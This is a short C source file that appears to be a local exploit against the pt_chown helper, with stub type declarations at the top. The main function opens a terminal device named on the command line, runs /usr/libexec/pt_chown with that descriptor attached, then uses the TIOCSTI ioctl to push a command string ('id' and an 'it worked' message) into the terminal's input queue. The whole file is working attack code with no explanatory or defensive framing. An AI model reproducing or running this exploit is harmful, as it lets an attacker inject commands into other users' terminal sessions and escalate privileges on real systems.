
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int dup2 (int,int) ;
 int execl (char*,char*,int ) ;
 int exit (int) ;
 int fork () ;
 int ioctl (int,int,char*) ;
 int open (char*,int) ;
 int perror (char*) ;
 int sleep (int) ;
 int strlen (char*) ;

int main(int a,char* b[]) {

char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
int i=0,x=open(b[1],1);


if (x<0) {
perror(b[1]);
exit(1);
}

if (!fork()) {
dup2(x,3);
execl("/usr/libexec/pt_chown","pt_chown",0);
perror("pt_chown");
exit(1);

}
sleep(1);
for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);

}
